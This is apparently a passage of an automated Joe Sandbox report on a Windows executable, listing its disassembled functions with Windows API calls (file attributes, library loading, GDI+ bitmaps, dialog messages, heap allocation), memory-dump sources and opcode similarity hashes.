                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00BB2641,000000FF), ref: 00B9ACB5
                                                                                                                    Similarity
                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3856339756-0
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00B8A23A,?,00B8755C,?,?,?,?), ref: 00B8A254
                                                                                                                      • Part of subcall function 00B8BB03: _wcslen.LIBCMT ref: 00B8BB27
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B8A23A,?,00B8755C,?,?,?,?), ref: 00B8A280
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00B9DEEC
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00B9DF03
                                                                                                                      • Part of subcall function 00B9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9B579
                                                                                                                      • Part of subcall function 00B9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9B58A
                                                                                                                      • Part of subcall function 00B9B568: IsDialogMessageW.USER32(0001040E,?), ref: 00B9B59E
                                                                                                                      • Part of subcall function 00B9B568: TranslateMessage.USER32(?), ref: 00B9B5AC
                                                                                                                      • Part of subcall function 00B9B568: DispatchMessageW.USER32(?), ref: 00B9B5B6
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2718869927-0
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B90836
                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8F2D8,Crypt32.dll,00000000,00B8F35C,?,?,00B8F33E,?,?,?), ref: 00B90858
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1175261203-0
                                                                                                                    • Opcode ID: 62c06c5e9b3db75cd455ceb9087fd5b7285c87508ec550d015cc6a8778731603
                                                                                                                    • Instruction ID: 58e1fa29d39f20864d755cead5fd9fe6fa3578b1ed865af951dce29c4c358a43
                                                                                                                    • Opcode Fuzzy Hash: 62c06c5e9b3db75cd455ceb9087fd5b7285c87508ec550d015cc6a8778731603
                                                                                                                    • Instruction Fuzzy Hash: A1E01276504118ABDF11B7A49C45FDA77ECEF09791F4400B57645D2104DAB4DA84CBA0
                                                                                                                    APIs
                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B9A3DA
                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B9A3E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1918208029-0
                                                                                                                    • Opcode ID: d212d97e786e4d7b0d62c27a92219b463e4d192304598a15f56fd7e32793daf5
                                                                                                                    • Instruction ID: 19223c38242625f072777a51904cd1da807b329d32c54cd4746a809f273a7c98
                                                                                                                    • Opcode Fuzzy Hash: d212d97e786e4d7b0d62c27a92219b463e4d192304598a15f56fd7e32793daf5
                                                                                                                    • Instruction Fuzzy Hash: B8E0ED71504218EBCB10DF55C541799BBE8EB04360F20C4AAA85693201E7B4AE04DB91
                                                                                                                    APIs
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BA2BAA
                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BA2BB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1660781231-0
                                                                                                                    • Opcode ID: 499a5cde2f8de7f70cb65316586b9196ca5bfa8f7295f3849afabfa17bc8556b
                                                                                                                    • Instruction ID: e1b723cc84983fa88a22a090afc9199883e7a21d5e3fe1884cc8a04a248da1ce
                                                                                                                    • Opcode Fuzzy Hash: 499a5cde2f8de7f70cb65316586b9196ca5bfa8f7295f3849afabfa17bc8556b
                                                                                                                    • Instruction Fuzzy Hash: 7DD0A93829C3046B6C142B7D2A0258823C9ED43B707E042DAF821968E2EE508040A031
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3351165006-0
                                                                                                                    • Opcode ID: a494df2f6ccb9bc163ff020f991d9f79738d3063fe92c9b977e674051e2e2896
                                                                                                                    • Instruction ID: f8e1327dea0bb86d47dc2b230bee990138279419a97f2ce03558129641e88afc
                                                                                                                    • Opcode Fuzzy Hash: a494df2f6ccb9bc163ff020f991d9f79738d3063fe92c9b977e674051e2e2896
                                                                                                                    • Instruction Fuzzy Hash: 28C0123205C280BECB010BB4DC0DC2BBBE8ABA5712F04C90CB0A5D2060CA38C150DB12
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: b50d7c86b106402c290cb9f621d7b6fc4acc4146e71bd445599e9b23636de691
                                                                                                                    • Instruction ID: 66d25f24acc9290956aeccc197debd05b50b33edcab76f05c2d258e1925b7294
                                                                                                                    • Opcode Fuzzy Hash: b50d7c86b106402c290cb9f621d7b6fc4acc4146e71bd445599e9b23636de691
                                                                                                                    • Instruction Fuzzy Hash: 7CC1A070A022549BEF15EF6CC4C4BA97BE9EF15310F0809F9EC459F2A2DB709946CB61
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 061fd71c9f5635bbfbb6c530a8cb6a010689c3e1b749a16c76f3aed01e7ed81b
                                                                                                                    • Instruction ID: 068c0e6fd38f47ddb7eef5ff801f0e80d050c765248a9ddbbd2108711efb9254
                                                                                                                    • Opcode Fuzzy Hash: 061fd71c9f5635bbfbb6c530a8cb6a010689c3e1b749a16c76f3aed01e7ed81b
                                                                                                                    • Instruction Fuzzy Hash: B971D471500B44AEDB35EB74C8919E7B7E9EF14B01F4009AEE6AB87251DA327684CF11
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B88289
                                                                                                                      • Part of subcall function 00B813DC: __EH_prolog.LIBCMT ref: 00B813E1
                                                                                                                      • Part of subcall function 00B8A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B8A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2506663941-0
                                                                                                                    • Opcode ID: e9b93217c9002f7becb1a7a93067f863fcd21d1d82f7f161fb802d3a04b6e9bc
                                                                                                                    • Instruction ID: cc062ac1764103a978f6f9409bf87e366f35624f2e31d45caa4ad8202059e06f
                                                                                                                    • Opcode Fuzzy Hash: e9b93217c9002f7becb1a7a93067f863fcd21d1d82f7f161fb802d3a04b6e9bc
                                                                                                                    • Instruction Fuzzy Hash: 2D4183719446589BDB24FB60CC55AEAB3F8EF00704F8404EAF18AA71A3EB755EC5CB50
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B813E1
                                                                                                                      • Part of subcall function 00B85E37: __EH_prolog.LIBCMT ref: 00B85E3C
                                                                                                                      • Part of subcall function 00B8CE40: __EH_prolog.LIBCMT ref: 00B8CE45
                                                                                                                      • Part of subcall function 00B8B505: __EH_prolog.LIBCMT ref: 00B8B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: bbbf92444e0362985152b54b82a9a3323a6a3ee7dc32619ca5de6957b74dd695
                                                                                                                    • Instruction ID: 58690fa73a202124110e42aaf0eb2d463aae85f5275199df77f7fef5fe5331d1
                                                                                                                    • Opcode Fuzzy Hash: bbbf92444e0362985152b54b82a9a3323a6a3ee7dc32619ca5de6957b74dd695
                                                                                                                    • Instruction Fuzzy Hash: AF4137B0905B40DEE724DF398885AE6FBE5BB28310F54496EE5FE83292CB716654CB10
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B813E1
                                                                                                                      • Part of subcall function 00B85E37: __EH_prolog.LIBCMT ref: 00B85E3C
                                                                                                                      • Part of subcall function 00B8CE40: __EH_prolog.LIBCMT ref: 00B8CE45
                                                                                                                      • Part of subcall function 00B8B505: __EH_prolog.LIBCMT ref: 00B8B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 5af734ea797113dcdd30abe96cec57e0dc4a18ee74e74fe2f9c8caf1c4e49c26
                                                                                                                    • Instruction ID: da2b3a741dc43a993d91232d58cdbc73badfcc644634df93f07cb81f06a63ae7
                                                                                                                    • Opcode Fuzzy Hash: 5af734ea797113dcdd30abe96cec57e0dc4a18ee74e74fe2f9c8caf1c4e49c26
                                                                                                                    • Instruction Fuzzy Hash: 574167B0905B40DEE724DF398885AE6FBE5BF28310F50496ED5FE83292CB726654CB10
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B9B098
                                                                                                                      • Part of subcall function 00B813DC: __EH_prolog.LIBCMT ref: 00B813E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 3f439019f59b878776f55ccfb81ea2943f926ef975d2e1ff7965ad2522227188
                                                                                                                    • Instruction ID: f4395e35bd2f934436519693877b8e538ff7df9ca08419b69c7db89740fa8a25
                                                                                                                    • Opcode Fuzzy Hash: 3f439019f59b878776f55ccfb81ea2943f926ef975d2e1ff7965ad2522227188
                                                                                                                    • Instruction Fuzzy Hash: 45318C71815259EACF14EF68D9919EEBBF8AF09300F1044EEE409B3252D735AE05CB61
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00BB3A34), ref: 00BAACF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: ec9e8e6dc0bf9d6fe4ab22f02acb0d0dcaae922608572ea339244127e43bb4a6
                                                                                                                    • Instruction ID: a6c57f6a20656538af3b26d940a5ac4a701fd0362db0665ad4687282eace1b83
                                                                                                                    • Opcode Fuzzy Hash: ec9e8e6dc0bf9d6fe4ab22f02acb0d0dcaae922608572ea339244127e43bb4a6
                                                                                                                    • Instruction Fuzzy Hash: 0F110A336082256F9B229E19DC5099A73D5EB8633071642A1FC95AB264EF34DC01C7E2
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B8CE45
                                                                                                                      • Part of subcall function 00B85E37: __EH_prolog.LIBCMT ref: 00B85E3C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 4f3964839b9e626166b1cc84ee40845ca7a174b2692c442c2745540590ef1ed3
                                                                                                                    • Instruction ID: cbeb3186ea55a679d8feefed38a0ef193769ce2f28148ffdcd3b72f364a29b5e
                                                                                                                    • Opcode Fuzzy Hash: 4f3964839b9e626166b1cc84ee40845ca7a174b2692c442c2745540590ef1ed3
                                                                                                                    • Instruction Fuzzy Hash: 581170B1A01244DEEB14EB79C945BAEBBE89F54300F1044AEE446D3292DB749E04CB62
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 20f1974e333f3ba97600de247c41c224a7e804c7c803ebac929fda8de73fced4
                                                                                                                    • Instruction ID: 97d5ddc6b4e0e7d873d1aa412f055fa9c08020ef0619b82714b1e2edc3e80f24
                                                                                                                    • Opcode Fuzzy Hash: 20f1974e333f3ba97600de247c41c224a7e804c7c803ebac929fda8de73fced4
                                                                                                                    • Instruction Fuzzy Hash: 12015233900528ABCF11BFA8CC819EEB7B5EF88750B0546A5E816B7172DA34CD05C7A0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00BAB136: RtlAllocateHeap.NTDLL(00000008,00BB3A34,00000000,?,00BA989A,00000001,00000364,?,?,?,00B8D984,?,?,?,00000004,00B8D710), ref: 00BAB177
                                                                                                                    • _free.LIBCMT ref: 00BAC4E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction ID: 5d85432c6b2915eb71923d0e0413e3ae224b22b30eaa48f14e1ced495f88e700
                                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction Fuzzy Hash: FD01D6722083056BE3318E65988596AFBE9EB8A370F25056DE59493281EF30A905C778
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00BB3A34,00000000,?,00BA989A,00000001,00000364,?,?,?,00B8D984,?,?,?,00000004,00B8D710), ref: 00BAB177
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 35b8a173f4fbbada790b473bf1e58aa62c5dcdf2d2d1a7da3a2588285caa43e4
                                                                                                                    • Instruction ID: 8e5915c9bbe0f694933410fd6529569b2646d5c4490c03f958a808b39de3d9e5
                                                                                                                    • Opcode Fuzzy Hash: 35b8a173f4fbbada790b473bf1e58aa62c5dcdf2d2d1a7da3a2588285caa43e4
                                                                                                                    • Instruction Fuzzy Hash: 9CF0B43252D12477DB255A61AC25F5E77C8FF43770B188291F828BB192CF30D90186E0
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00BA3C3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: 5b7ce569f6a1e5e88cdd594c4362479c9cad09c5ba80e1ebebe16f48b54da503
